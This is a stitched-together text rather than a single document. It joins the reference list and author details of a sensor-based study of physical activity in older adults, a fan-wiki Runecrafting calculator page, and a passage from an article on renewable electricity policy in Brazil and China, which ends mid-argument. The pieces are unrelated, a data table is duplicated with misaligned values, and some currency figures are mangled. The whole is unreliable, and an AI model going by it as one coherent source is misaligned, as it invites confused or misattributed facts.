Touvier, M. et al. Changes in leisure-time physical activity and sedentary behaviour at retirement: a prospective study in middle-aged French subjects. Int. J. Behav. Nutr. Phys. Act. 7, 14 (2010).
6. 6.
Jackson, A. S., Sui, X., Hébert, J. R., Church, T. S. & Blair, S. N. Role of Lifestyle and Aging on the Longitudinal Change in Cardiorespiratory Fitness. Arch. Intern. Med. 169, 1781–1787 (2009).
7. 7.
Jonkman, N. H., van Schooten, K. S., Maier, A. B. & Pijnappels, M. eHealth interventions to promote objectively measured physical activity in community-dwelling older people. Maturitas 113, 32–39 (2018).
8. 8.
Wild, K. V., Mattek, N., Austin, D. & Kaye, J. A. “Are You Sure?”. J. Appl. Gerontol. 35, 627–641 (2016).
9. 9.
Lyons, B. E. et al. Pervasive Computing Technologies to Continuously Assess Alzheimer’s Disease Progression and Intervention Efficacy. Front. Aging Neurosci. 7, 102 (2015).
10. 10.
Murphy, S. L. Review of physical activity measurement using accelerometers in older adults: Considerations for research design and conduct. Prev. Med. (Baltim). 48, 108–114 (2009).
11. 11.
Saha, D. & Mukherjee, A. Pervasive computing: a paradigm for the 21st century. Computer (Long. Beach. Calif). 36, 25–31 (2003).
12. 12.
Rantz, M. J. et al. Sensor technology to support Aging in Place. J. Am. Med. Dir. Assoc. 14, 386–91 (2013).
13. 13.
Scanaill, C. N. et al. A Review of Approaches to Mobility Telemonitoring of the Elderly in Their Living Environment. Ann. Biomed. Eng. 34, 547–563 (2006).
14. 14.
Zhang, Y. & Wu, M. Design of Wireless Remote module in X-10 Intelligent Home. In IEEE International Conference on Industrial Technology 1349–1353 (IEEE), https://doi.org/10.1109/ICIT.2005.1600845 (2005).
15. 15.
DomoSafety S. A. Available at, http://www.domo-safety.com/. (Accessed: 16th September 2018).
16. 16.
Song, B., Choi, H. & Lee, H. S. Surveillance Tracking System Using Passive Infrared Motion Sensors in Wireless Sensor Network. In 2008 International Conference on Information Networking 1–5, https://doi.org/10.1109/ICOIN.2008.4472790 (IEEE 2008).
17. 17.
Srinivasan, S., Han, J., Lal, D. & Gacic, A. Towards automatic detection of falls using wireless sensors. In 2007 29th Annual International Conference of the IEEE Engineering in Medicine and Biology Society 1379–1382, https://doi.org/10.1109/IEMBS.2007.4352555 (IEEE 2007).
18. 18.
Popescu, M., Hotrabhavananda, B., Moore, M. & Skubic, M. VAMPIR - An Automatic Fall Detection System Using a Vertical PIR Sensor Array. In Proceedings of the 6th International Conference on Pervasive Computing Technologies for Healthcare, https://doi.org/10.4108/icst.pervasivehealth.2012.248759 (IEEE 2012).
19. 19.
Moshtaghi, M., Zukerman, I., Albrecht, D. & Russell, R. A. In 139–151, https://doi.org/10.1007/978-3-642-38844-6_12 (Springer, Berlin, Heidelberg 2013).
20. 20.
Aran, O., Sanchez-Cortes, D., Do, M.-T. & Gatica-Perez, D. In 51–67, https://doi.org/10.1007/978-3-319-46843-3_4 (Springer, Cham 2016).
21. 21.
Galambos, C., Skubic, M., Wang, S. & Rantz, M. Management of Dementia and Depression Utilizing In- Home Passive Sensor Data. Gerontechnology 11, 457–468 (2013).
22. 22.
Hayes, T. L. et al. Unobtrusive assessment of activity patterns associated with mild cognitive impairment. Alzheimers. Dement. 4, 395–405 (2008).
23. 23.
Urwyler, P. et al. Cognitive impairment categorized in community-dwelling older adults with and without dementia using in-home sensors that recognise activities of daily living. Sci. Rep. 7, 42084 (2017).
24. 24.
Nasreddine, Z. S. et al. The Montreal Cognitive Assessment, MoCA: A Brief Screening Tool For Mild Cognitive Impairment. J. Am. Geriatr. Soc. 53, 695–699 (2005).
25. 25.
Yesavage, J. A. & Sheikh, J. I. Geriatric Depression Scale (GDS): Recent evidence and development of a shorter version. Clin. Gerontol. 5, 165–173 (1986).
26. 26.
EuroQol. EQ-5D-3L – EQ-5D. Available at: https://euroqol.org/eq-5d-instruments/eq-5d-3l-about/. (Accessed: 30th September 2018).
27. 27.
Podsiadlo, D. & Richardson, S. The Timed “Up & Go”: A Test of Basic Functional Mobility for Frail Elderly Persons. J. Am. Geriatr. Soc. 39, 142–148 (1991).
28. 28.
Tinetti, M. E. Performance-Oriented Assessment of Mobility Problems in Elderly Patients. J. Am. Geriatr. Soc. 34, 119–126 (1986).
29. 29.
Teychenne, M., Ball, K. & Salmon, J. Physical activity and likelihood of depression in adults: A review. Prev. Med. (Baltim). 46, 397–411 (2008).
30. 30.
Halaweh, H., Willen, C., Grimby-Ekman, A. & Svantesson, U. Physical Activity and Health-Related Quality of Life Among Community Dwelling Elderly. J. Clin. Med. Res. 7, 845–52 (2015).
31. 31.
Acree, L. S. et al. Physical activity is related to quality of life in older adults. Health Qual. Life Outcomes 4, 37 (2006).
32. 32.
Campbell, I. H. et al. Measuring changes in activity patterns during a norovirus epidemic at a retirement community. In 2011 Annual International Conference of the IEEE Engineering in Medicine and Biology Society 6793–6796, https://doi.org/10.1109/IEMBS.2011.6091675 (IEEE 2011).
33. 33.
Rantz, M. J. et al. Using sensor networks to detect urinary tract infections in older adults. In 2011 IEEE 13th International Conference on e-Health Networking, Applications and Services 142–149, https://doi.org/10.1109/HEALTH.2011.6026731 (IEEE 2011).
34. 34.
Taiyun, W. & Viliam, S. R package ‘corrplot’: Visualization of a Correlation Matrix (Version 0.84) (2017).
## Acknowledgements
We would like to thank all subjects for their participation. In addition, we thank everyone involved in gathering the presented data, in particular we would like to thank Romina Saurer for her valuable help in data gathering. This study was partially funded by the Swiss Commission for Technology and Innovation (CTI) through the SWISKO project (17662.2 PFES-ES).
## Author information
Authors
### Contributions
N.S., H.S., B.P., V.S., P.B., D.G., P.U., L.M., R.M.M. and T.N. designed and planned the study. N.S., H.S. and B.R. installed and maintained the system and measured the participants. N.S. and A.B. analysed the data. N.S., A.B., P.U. and T.N. wrote the manuscript. All authors reviewed and approved the final manuscript.
### Corresponding author
Correspondence to Tobias Nef.
## Ethics declarations
### Competing Interests
Dr. Philipp Buluschek is employed by DomoSafety S.A., which is the manufacturer of the displayed sensor system. The remaining authors declare no potential conflict of interest.
Publisher’s note: Springer Nature remains neutral with regard to jurisdictional claims in published maps and institutional affiliations.
## Rights and permissions
Reprints and Permissions
Schütz, N., Saner, H., Rudin, B. et al. Validity of pervasive computing based continuous physical activity assessment in community-dwelling old and oldest-old. Sci Rep 9, 9662 (2019). https://doi.org/10.1038/s41598-019-45733-8
• Accepted:
• Published:
• ### Potential of Ambient Sensor Systems for Early Detection of Health Problems in Older Adults
• Hugo Saner
• , Narayan Schütz
• , Angela Botros
• , Prabitha Urwyler
• , Philipp Buluschek
• , Guillaume du Pasquier
• & Tobias Nef
Frontiers in Cardiovascular Medicine (2020)
• ### Long-Term Home-Monitoring Sensor Technology in Patients with Parkinson’s Disease—Acceptance and Adherence
• Angela Botros
• , Narayan Schütz
• , Martin Camenzind
• , Prabitha Urwyler
• , Daniel Bolliger
• , Tim Vanbellingen
• , Rolf Kistler
• , Stephan Bohlhalter
• , Rene M. Müri
• , Urs P. Mosimann
• & Tobias Nef
Sensors (2019)
|
## FANDOM
39,430 Pages
"Runecrafting calculator" redirects here. See also Calculator:Runecrafting/Profit per trip and Calculator:Runecrafting/Multiple runes.
template = Calculator:Template/Runecrafting
form = Form
result = Result
param = xplvlc|Calculate current level or XP?|Level|select|Level,Experience
param = nowxp|Your current level/XP (per above)|1|number|
param = xplvld|Calculate desired level or XP?|Level|select|Level,Experience
param = wantxp|Your desired level/XP (per above)|2|number|
param = abyss|Runecrafting in the Abyss?|No|select|Yes,No,Skull
param = ess|Essence carried per load|28|number|1-118
param = tiara|Tiaras carried per load|14|number|0-14
The form will appear here when it loads. If it fails you load, you can still calculate with the formulas given below. This calculator will determine: How many runes you will have to craft to reach your desired level or XP amount. The total cost of the essence required to do so. The return value if you choose to sell the runes The calculator is assuming that: You will only be crafting one type of rune to reach the desired level. You will be using the least expensive form of essence for the rune you are crafting. You craft only one rune per essence (this may be fixed in the future). Methods in yellow are above the current level. Essence Amounts: Inventory = 28 Small Pouch = +3 Medium Pouch = +6 Large Pouch = +9 Giant pouch = +12 Massive Pouch = +17 Abyssal Parasite = +7 Abyssal Lurker = +12 Abyssal Titan = +20 Partial Ethereal Outfit = +6 Infinity Ethereal Outfit = +12 Mortytania Legs 2 = +10% (blood runes only) Explorer's Ring 2 = +10% (air/water/fire/earth runes only)
|
## Abstract
This article examines developments in the renewable electricity sector in Brazil and China since 2000. The two countries share many interests with respect to solar and wind power, but institutional differences in state–business relations led to different outcomes. In China, in a context of corporatist state–business relations, state interventions were more far-reaching, with the state coordinating with state-owned banks, offering large financial and investment incentives to state-owned or state-connected enterprises. By contrast, in Brazil’s public–private partnerships, state support to promote renewable energies was shaped by a stronger preference for competitive auctions and stricter financing rules. The differences in state–business relations help explain the observed developmental trajectories in wind and solar power.
International climate negotiations have largely foundered, in part due to conflicting expectations about the role that large emerging powers like China and Brazil should play in reducing their greenhouse gas (GHG) emissions. Their record economic growth rates after 2000 have been accompanied by an equally rapid rise in emissions, and the energy investments they are making to support their economic growth will lock in emissions levels for decades to come. Even as they grow quickly, the emerging powers continue to have millions of poor citizens, and they have made it clear that any climate mitigation action must be responsive to national development needs.1
We take the claim that development is a priority as our starting point in this article, where we examine developments in the renewable electricity sector in Brazil and China since 2000. Renewable energies were almost non-existent in both countries in the 1990s, but over the past decade China expanded its generation of wind and solar power while gaining world leadership in both industries. Brazil now generates substantial wind power and has a thriving wind industry, though solar power lags. Both countries have twinned their renewable electricity procurement with policies to develop related industrial capacity—they do not want to just install imported components—but they have done so in different ways and with distinct outcomes. What explains the differences in the policies initiated and in the development and climate emissions outcomes? We draw on explanatory variables from classic comparative politics theories to answer those questions, examining the roles of interests and institutions in determining policies and outcomes.2
We argue that the two countries share many interests with respect to renewable energy, but institutional differences in state–business relations have led to different outcomes. In Brazil, a public–private partnership approach played a key role in promoting wind generation and a new wind industry, but left the solar sector largely moribund. In China, a state corporatist approach meant that the political agendas of national and local governments, as well as the vested interests of powerful state-owned enterprises (SOEs) and state-backed enterprises, shaped policy outcomes.
Our analysis draws on original fieldwork conducted in Brazil and China between 2010 and 2014. In Brazil, we interviewed officials in the energy planning agencies and Brazilian National Economic and Social Development Bank (BNDES), as well as industry and community representatives. In China, we conducted fieldwork in Beijing as well as in Hunan, Jiangsu, and Shandong provinces. The analysis also draws from government policy documents, media reports, and available secondary sources.
## Interests, Institutions, and Renewable Sources of Electricity
Why do countries build the electricity infrastructure that they do, and why might they turn to renewable fuel sources for electricity? Many studies of these choices generate straightforward answers related to the energy endowments of a country and the technical ease and cost of developing them.3 Assessing the changing balance of concrete material interests is a powerful analytical tool for understanding phenomena like energy system transitions.4 States have distinct endowments in the fuel sources that could be used to power electricity plants; these tend to form the foundation of powerful coalitions supporting the continued use of abundant, cheap fuels. State and market actors also pay close attention to signals like the initially high, but then rapidly dropping, prices of renewable electricity technology after 2000.
Policymakers in Brazil and China have many of the same interests in deploying solar and wind energies. Wind and solar power improve local air pollution and help national leaders meet international climate change commitments. Renewable energy also helps to address domestic energy security concerns. Installing and running wind and solar farms bring potential economic benefits, although benefits are greater if local industries are established to produce components. In this article, we consider how recent developments may be changing those interest calculations.
However, our findings indicate that institutional differences may be as important as interests in determining how that transition takes place, and even in shaping the outcomes. In making this argument, we draw on a strong tradition in the study of comparative environmental politics of placing institutions—typically federal versus unitary arrangements or systems of interest representation—at the center of explanations of environmental performance.5 Over several decades, scholars have especially used cross-national variation in state–society relations to explain differences in environmental outcomes.6 Most concluded that neo-corporatist institutions lead to better environmental outcomes than pluralist configurations. In corporatism, the close, repeated interactions between the state and centrally organized business interests are thought to build trust, generate better information, and help solve collective action problems.
In discussions of the electricity sector itself, state–society relations take center stage. Here the specific focus is less on the system of interest representation per se (e.g., corporatist vs. pluralist) and more on the balance of interests between state and private market actors in a particular sector. Much of this literature departs from the stylized opposition of state-centered and market-centered approaches. In the former, state ministries and SOEs operated monopoly electricity sectors together, often drawing on subsidized state capital resources and playing a number of social functions beyond mere electricity provision.7 Market-centered approaches were created by the neoliberal “standard reform model” applied around the world in the 1980s and 1990s. In this model, the electricity sector was unbundled and privatized while independent regulatory agencies were established to oversee the reformulated sector, hewing to market criteria.8
The virtues and problems of the state-centered model were evident in concrete historical outcomes. On the positive side, the state-centered model could take advantage of economies of scale, with the state coordinating industrial sectors and acting as a guardian for the public interest and national economic development9—not unlike the advantages associated with the corporatist system of representation. On the negative side, the model was blamed for tending towards both over-investment (when states had capital) and for failure to discipline demand and invest sufficiently (when states lacked capital). Without market-clearing prices, electricity provision was both expensive and inefficient.10 The results of the market-centered approach are less clear, in part because the model was rarely fully implemented, leaving hybrid approaches with nationally idiosyncratic outcomes.11 On the topic of interest here—the adoption of renewable electricity—there was no relationship between economic reforms and carbon emissions for developing countries.12
Because of our limited understanding of recent state-centered or market-centered approaches on climate and energy issues, there is a need for the kind of detailed qualitative case study of two important emerging powers presented here. These two countries partially implemented market reforms in their electricity sectors, with Brazil’s being more complete than China’s. Thus the two cases allow us to look more closely at the relationship between hybrid models and renewable electricity outcomes. Broadly speaking, we would expect the Chinese approach to more closely follow the expectations of the state-centered model. However, both cases have particular national characteristics that shape outcomes.
Brazil’s hybrid electricity sector sets up an electricity political economy that toggles between national public planning, procurement, and financing agencies and an increasingly private generation sector.13 This public–private partnership approach came to include a number of state supports for the renewable energy sector after 2002, but since 2009 it also imposed a competitive auction system that disciplined prices. The independent regulator holds regular auctions for licenses to supply electricity to the national grid, with both public and private generation firms participating; those that promise to supply electricity at the lowest prices win. Similarly, BNDES provides credit for many projects at subsidized rates, but also then insists on repayment.
In China, state–business relations can be best described as state corporatist. The ongoing centrality of the state and state-owned or state-backed enterprises in the political economy and its authoritarian decentralized governance structure locate the calculation of interests primarily in complex relations between central and local governments.14 The state works with SOEs and mixed-ownership firms to develop a globally competitive renewable energy sector.15 The state retains overall control of the market and decides the rules and exercises control over market entry. In view of heavy state control of access to valuable resources, businesses typically seek to establish close ties to state agents. A unique feature of the Chinese case is the relatively large discretion accorded to local governments in guiding economic development, giving Chinese state corporatism a decidedly local character.16
In the next section, we provide a brief overview of the Chinese and Brazilian electricity sectors that shows some of the factors that established the initial constellations of interests in each. Following this, sections on each country and their institutional framework for electricity detail how those interests have been reshaped in distinct contexts.
## Renewable Fuel Sources in the Chinese and Brazilian Electricity Grids
Brazil and China use strikingly different fuel sources for their national electricity generation. As Table 1 shows, each draws more than two-thirds of its electricity from a single source, coal in China and hydropower in Brazil.
Table 1
Installed Electricity Generation Capacity by Fuel Type, 2011
Fuel TypeBrazil (gigawatts)Brazil %China (gigawatts)China %
Total 119.1 100 1100.5 100
Fossil fuels 22.4 19 766.0 70*
Hydro 82.5 69 231.0 21
Nuclear 1.9 11.8
Wind 1.4 62.4
Solar 0.0 0.03 3.1 0.28
Biomass 10.9 8.2
Other 0.0 18.0
Fuel TypeBrazil (gigawatts)Brazil %China (gigawatts)China %
Total 119.1 100 1100.5 100
Fossil fuels 22.4 19 766.0 70*
Hydro 82.5 69 231.0 21
Nuclear 1.9 11.8
Wind 1.4 62.4
Solar 0.0 0.03 3.1 0.28
Biomass 10.9 8.2
Other 0.0 18.0
*
Installed capacity of coal is 66 percent.
Sources: EIA, 2011.
Table 1 shows that alternative renewable electricity sources like wind and solar power still constitute only a small percentage of each country’s national electricity matrix. In contrast, Table 2 reveals substantial changes since 2000 in both countries. New construction increasingly turns to wind and solar power and their rate of growth indicates that an energy transition is underway.
Table 2
Evolution of Wind and Solar Generation Capacity over Time (megawatts)
Installed Wind 2000–2001Installed Wind 2013Installed Solar 2000Installed Solar 2013
Brazil 28 1,805 n.a. 20
China 340 91,000 19 18,100
Installed Wind 2000–2001Installed Wind 2013Installed Solar 2000Installed Solar 2013
Brazil 28 1,805 n.a. 20
China 340 91,000 19 18,100
Sources: EPE 2013, 99; EPE 2012, 1; GWEC 2014; EIA 2014; Leite 2009, 162; Zhang et al. 2013a, 326.
Each country has environmental reasons to turn away from its incumbent fuel. The overreliance on coal, combined with rapid urbanization, created air and water pollution crises around China. It became the world’s largest emitter of GHGs in 2007 and the biggest energy consumer in the world in 2010.17 Brazil’s large hydropower plants are generally much cleaner, but studies have found varying amounts of methane emissions associated with them.18 Other environmental and social costs are high, and Brazil has difficulty developing additional large hydropower plants as a result.
Power supply shortages in 2001 (Brazil) and 2002 and 2005 (China) gave additional incentives to expand and diversify the electricity matrix and help account for the timing of changes we observe.19 However, the energy transition is uneven and incomplete in both countries, with solar power installation lagging well behind wind power generation in China and still largely missing in Brazil. China’s transition has been much quicker than Brazil’s, with rapid scaling up of installed capacity, although solar power expanded primarily after the financial crisis in 2009.20
Similar patterns are even clearer in the extent to which these countries now manufacture the components of wind and solar plants rather than simply installing imported versions of them. This is the second dimension of the political economy of the new renewables we consider. China now has 70 domestic manufacturers of wind turbines, and the six largest Chinese “national champions” were among the top 15 global wind turbine manufacturers, accounting for 26 percent of total market share in 2013.21 The technical capacities of these companies have developed rapidly. By 2014, the quality gap between Chinese and foreign manufacturers was offset by a much more significant price gap.22 Brazil also managed to nationalize some wind production with turbine, tower, and parts manufacturers.23
The expansion of solar photovoltaic (PV) manufacturing in China is even more impressive, as it became the largest producer of solar PV modules in the world in 2008, overtaking Japan and Germany. Solar PV production rose from 2 percent of global production in 2003 to 64 percent in 2012.24 The nine largest Chinese manufacturers accounted for 30 percent of total market share in 2011.25 The technical capabilities of Chinese solar PV manufactures have continuously improved.26 In contrast, Brazil currently has very limited production capacity in solar power.
In the next sections, we examine the interests and institutions that created these outcomes in greater detail. We pay attention to state policies intended to generate demand for renewable electricity, as well as those intended to generate supply. While both countries developed green industrial policies to promote new renewables, related policies have had variable effects under different institutional settings.
## Brazilian National Renewable Energy Programs and Incentives
Brazil built very little new electricity generation capacity in the 1990s, and a severe drought in 2001 and resulting widespread blackouts brought the system into crisis. In 2002 the Cardoso presidency initiated the Program of Incentives for Alternative Energy in Electricity (Proinfa). Thus what Brazil calls “alternative renewables”—wind, solar, small hydro, and biomass—were first promoted to reduce the system’s over-reliance on large hydro.27
Proinfa at first set a feed-in tariff (FIT) to add 1100 megawatts (MW) each of wind, small hydro, and biomass-based electricity to the system, with 20-year contracts for independent power producers. Proinfa called for a second stage wherein renewable energy would reach 10 percent of national electricity consumption by 2022.28 The new Lula administration amended the law the next year,29 introducing an auction system. Both FITs and auctions, with long-term contracts, provide the kind of guaranteed demand necessary to draw private generation firms into the sector.
Both versions of Proinfa included national content requirements. These rested on economic calculations within the Ministry of Mines and Energy that the additional costs of adding renewable energy to the grid could be offset in the long run if such requirements successfully localized production and innovation in the sector.30 The Cardoso administration called for a 50-percent national content requirement only in the first stage of Proinfa—the kind of disciplining often favored by market-oriented proponents of industrial policy, but the Lula administration required 60-percent national content in the first stage and 90 percent in a second stage that was never implemented.31 The leftist Lula administration favored renewable energy as a central element of a modern economy in which the state would support Brazil’s innovation capacities and global competitiveness.32
The sense that green industries are part of the economy of the future was repeated in interviews, including within the Brazilian national development bank, BNDES.33 BNDES’ total lending portfolio more than doubled in size from 2002 to 2012, and the electricity and gas sector was a top recipient almost every year.34 BNDES, which is mandated to promote employment in Brazil and has its own domestic content requirements, has effectively become the guarantor of ongoing national production, particularly after the second stage of Proinfa was cancelled in favor of moving directly to auctions with no explicit local content minimums. BNDES has made about 300 project finance loans in the energy sector since 2004, and only one has been non-performing.35
The Brazilian political economy under Lula and his successor Dilma Rousseff (both of the Workers’ Party, Partido dos Trabalhadores) has been broadly pro-business,36 and the public–private partnerships of electricity generation in Brazil fit that model well. State actors must be sensitive to firms’ requirements, since electricity providers will sit out auctions if the renewable electricity contracts offered are not lucrative enough, as they did in a wind-only auction in 2008.37 But Brazilian auctions are also constructed with many compliance mechanisms that are usually flexibly applied.38 The two-stage auctions pit firms against each other, and the resulting tariffs are substantially lower and less profitable than was the case for the FIT. Winning bid prices are now almost too low for successful realization of the bids.39 This outcome supports the Brazilian state’s other major concern, which is to keep prices for consumers and industry low.
### Wind Power
The programs outlined above summarize the most significant interventions to promote wind power in Brazil. The demand and supply sides have been tightly interwoven. In the Proinfa program, as already noted, demand for wind power for the national grid was directly linked to the requirement of 60 percent local content. After the Proinfa program unofficially ended in 2008, reserve auctions for wind in 2009, 2010, 2011, and 2012 continued to present substantial demand. (While many Brazilian electricity auctions are open to plants using any fuel type, reserve auctions ask for bids for specific fuel types.) These auctions did not formally require local content production, but the only bids low enough to win the auctions were those with financing from BNDES—the development bank’s subsidized rates for wind generation are about 4 percent below market rates.40
The growth in wind power itself is clear: from essentially no generation capacity, Brazil has contracted to have 8.4 gigawatts (GW) installed capacity in its national grid by 2017.41 Proinfa established the critical initial demand levels to kickstart a wind generation industry from almost nothing. Its FIT was high enough to attract both generation firms and financiers, even though none had much experience with wind power.42 As prices fell from Proinfa’s $150/megawatt-hour (MWh) to an average of$84.79 in the 2009 auction and $42.09 in 2012,43 participants became more specialized and the winning firms have grown steadily larger. Proinfa’s domestic content requirements have significantly changed the supplier landscape for wind power. As recently as 2008, there was only one manufacturer of wind components in Brazil, the German-based Wobben Windpower, which was unable to keep up with the demand of the first Proinfa stage.44 In simulations, the national production requirements were shown to reduce early wind-generation capacity below what would otherwise have existed if Brazil had simply imported the components to meet Proinfa’s demand.45 As auctions for wind power showed continuing demand, other firms followed Wobben Windpower to Brazil. By 2014, there were four manufacturers of wind turbines and seven turbine assemblers in Brazil, along with thirteen manufacturers of towers and thirteen of parts and components (with some individual firms producing in more than one category).46 These tallies come from the Brazilian Agency of Industrial Development, which mapped the Brazilian wind-power production chain in an effort to spur additional private investment and state-based industrial policy for the sector.47 Financial incentives in the form of subsidized credit from BNDES also helped draw international wind energy firms to Brazil and spurred domestic firms to set up production. After 2005, BNDES allowed a flexible timeline for implementation of its 60-percent domestic content requirement, making individual agreements with firms that conditioned ongoing support on moving production to Brazil.48 At the end of 2011, however, BNDES informed six of the eleven firms that they had not nationalized enough of their production to allow BNDES to finance contracts for their products.49 BNDES has since written an extended document that details exactly how it accounts for domestic content in turbines and the required stages of compliance with the law.50 By 2015, for example, BNDES will only finance domestically produced nacelles, which are among a turbine’s most technologically advanced components. Prices for these domestically produced goods are higher than Chinese and European prices, squeezing installers since the winning prices in the 2011 and 2012 auctions were very low.51 ### Solar Power The first stage of Proinfa did not include solar power, which continues to lag well behind wind power. Brazil has many of the same interests in solar-powered electricity as in wind: solar installations can be assembled quickly, adding more capacity to the grid without creating new dependencies on imported or fossil fuel. Solar’s higher prices and the technical challenges involved in creating domestic production lines of solar components have been the major blocks.52 To date, very few demand-side interventions promote solar power in Brazil. Solar power has been far too expensive to compete in open auctions to supply the national grid. In October 2014, EPE held an auction for solar, wind, and biomass—the first reserve auction for solar power. The solar power generation capacity that does exist—about 20 MW in 2012—is limited to small, distributed solar installations, mostly in isolated and remote areas. The timing of the demand-side incentives for solar production responded to the drop in global solar prices, as world installed capacity soared and Chinese producers entered the market. That same drop in prices—not yet enough to make solar fully competitive with other electricity sources, but likely to become so soon—has generated a heated debate about whether Brazil should adopt solar power by simply importing the ever-cheaper internationally produced components or by trying to localize production.53 Unlike wind and other alternative renewable fuels, solar power production involves few heavy, low-technology components of the kind that make a country’s entry into component production easy. Instead, solar panels make up 50 percent of the value-added of the installation, and the PV panels likely to be used in Brazil require highly refined silicon. Brazil has the capacity to build cells and PV modules and has large amounts of high-quality quartz that could be refined into silicon. However, it does not have the technical capacity to do the refining.54 BNDES has been funding two firms to develop the purification process, and is looking to develop new technology that demands less electricity.55 ANEEL opened a small research and development competition in 2011 to insert solar power into the Brazilian electricity matrix; around 130 firms have formed an industry association to further explore possibilities.56 In the meantime, the debate about whether to offer more incentives continues. As already noted, the Brazilian public–private partnership approach relies on the response of private firms to government auctions by bidding to supply electricity. For them, the exact rules chosen affect their participation.57 Finding the right balance between the conditions that will draw generation firms into public auctions, the policies demanded by would-be producers of components, and prices consumers will tolerate is a delicate prospect. The future of renewable energy in Brazil depends on it. ## Chinese National Renewable Energy Programs and Incentives The development of renewable energies in China follows national laws and renewable energy programs set by the central government. The Renewable Energy Law (2005) and its 2009 amendments comprise the core policy framework. The most important measures include the introduction of FITs, guidelines on cost-sharing arrangements between utilities and electricity end users, creation of the Renewable Energy Development Special Fund, and various other investment incentives for solar and wind power electricity generation.58 In parallel, various national planning targets intended to stimulate the development of solar and wind energy capacity were announced by the National Development and Reform Commission (NDRC), the powerful bureaucracy in charge of China’s overall long-term economic and social planning. The leadership’s decision to task NDRC with oversight of renewable energy development signals of how integral renewables are to economic planning. To encourage the implementation of national plans, binding targets are built into the “cadre management system,” an incentive scheme used to assess and monitor the performance of officials. To advance up the ladder and receive bonus payments, government officials and managers of SOEs need to meet these targets as part of their annual performance assessment; repeated non-implementation can be penalized through redeployment to a remote locality or even, in principle if not often in practice, outright expulsion from office.59 Provincial and sub-provincial governments also initiated numerous preferential policies that played critical roles in the rapid rise of solar and wind energies. In fact, many local governments nurtured home-grown solar and wind manufacturing enterprises well before national support programs were established and well ahead of the official designation of renewables as a strategic emerging industry (SEI) in 2010. As illustrated below, the solar PV manufacturing industry in particular experienced rapid expansion between 2003 and 2008 at local levels, before national supply-side incentives were put in place. Due to large variations in the patterns and sequencing of governments’ demand-side and supply-side interventions, the development trajectories of wind and solar industries in China differ markedly. ### Wind Power In the mid-2000s, the central government launched a slate of demand-side policies to create incentives for wind turbine installation across China. China’s Medium to Long-Term Development Plan for Renewable Energy (2007) set non-binding capacity targets for power generation companies with total capacity of over 5 GW, requiring them to generate 3 percent of their capacity from non-hydro renewable energy sources by 2010 and 8 percent by 2020. As no more specific guidance was given as to the proportion of wind versus solar, most power generators identified wind power as the more attractive option, given its comparative affordability and large growth potential.60 A wind concession program offered five rounds of competitive bidding during 2003 to 2007 to develop large wind farms. Successful bidders received guarantees that provincial transmission companies would purchase all electricity generated. Generally, SOEs outbid other investors by offering below-market prices, and they now account for more than 80 percent of the country’s installed wind power capacity.61 The program was seen as a success since it significantly brought down prices and awarded a total of 2.6 GW of permits to developers.62 These demand-side incentives were coupled with supply-side interventions that began in 2003 and benefited domestic wind turbine manufacturers. The bidding rounds included domestic content requirements that supported industrial development. Initial rounds required that 50 percent of the content of each wind turbine be made in China; this share increased to 70 percent in 2004. International wind firms transferred technology and know-how to China by setting up assembly plants and local manufacturing facilities.63 As a result, the domestic share of newly purchased wind power equipment increased from 30 percent in 2005 to 90 percent in 2010. In the context of emerging trade disputes with the US, in 2009 China removed the 70-percent domestic content requirement. Local governments’ strong mandate to create new growth and employment opportunities further benefited local wind turbine and component manufacturers. Some local governments only approved wind projects under the condition that developers would set up local manufacturing.64 In the early and mid-2000s fierce competition emerged among local governments around the establishment of renewable energy parks, wherein free or subsidized land and generous tax breaks were offered to producers. One example is the city of Changsha’s effort to develop a local wind turbine and component and solar hub in their National Hi-tech Development Zone. Pressures to restructure the city away from reliance on cement and chemical plants were behind Changsha’s enthusiasm for renewables.65 The municipal government offered local renewable manufacturers the purchase of government land for a third of the regulated price, and a few companies even received the land for free. In addition, renewable energy companies benefited from significant tax breaks during the first years of operation and were aided by municipal governments in their efforts to obtain low-interest loans from the state-owned commercial banks. Because these low-cost loans and land provisions fall into the category of disallowed subsidies under WTO rules, the municipal government discontinued interviews on this issue in September 2010, when the topic became too sensitive in the context of emerging China–US trade disputes. These strategic efforts by national, provincial and municipal governments played a key role in the development and growth of China’s wind turbine and component manufacturing industry. At the national level, the NDRC played an important role in coordinating wind industrial policies by introducing binding renewable energy targets, domestic content requirements, concession rounds, financial incentives, and FITs, among others. State interventions in China were more generous than in Brazil, with state-owned banks and ministries offering large bidding rounds and soft loans to producers. ### Solar Power Solar PV installations initially ranked low on the government agenda, since solar energy was perceived to be comparatively expensive.66 Solar PV deployment programs were small and aimed at off-grid power generation.67 Before 2009, total solar PV nationwide stood at only 160 MW installed capacity. While competitive bidding rounds during 2003–2007 for wind helped develop this sector, similar government support began only after 2009. The minimal demand-side subsidies and the absence of large-scale consumer subsidy programs for Chinese citizens are a sharp contrast to the full range of supply-side subsidies used to stimulate a domestic export-oriented solar PV manufacturing industry in China. The booming market for solar PV manufacturing was developed to meet rapidly rising demand in Europe and North America. Solar manufacturers benefited most notably from national FDI attraction policies, financial and tax incentives, R&D subsidies, and access to the national Renewable Energy Development Special Fund. Moreover, for its first solar power plant constructed in 2009, China allegedly required that 80 percent of each panel be made in China.68 Local governments were key players in the creation of preferential policies for PV manufacturing. In the early and mid-2000s, local governments offered encouragement for local solar enterprises through local tax revenue, employment, and prestige benefits. For example, the Wuxi municipal government in Jiangsu province convinced various municipal-government-run investment companies and venture funds to provide 50 million RMB as starting capital for Wuxi Suntech, a small solar manufacturing company set up by a foreign-trained Chinese business entrepreneur in 2001.69 In Xinyu (Jiangxi), the municipal government invested$32 million (200 million renminbi (RMB)) in the newly formed LDK Solar enterprise in 2005 and provided additional land in a high-tech development zone. Xinyu officials also introduced LDK Solar’s business to the managers of the local branches of various state-owned banks. As a result, within a year of operation, LDK Solar secured large short-term loans from three banks. Its borrowings increased from $57 million in 2006 to$666 million in 2008, and the company’s debt-to-asset ratio increased from 47 percent in 2007 to 75 percent in 2008. LDK was no exception and, over the past decade, the debt-to-asset ratio of many Chinese solar manufacturers passed 0.8; most foreign competitors’ debt ratios rarely rise above 0.5.70
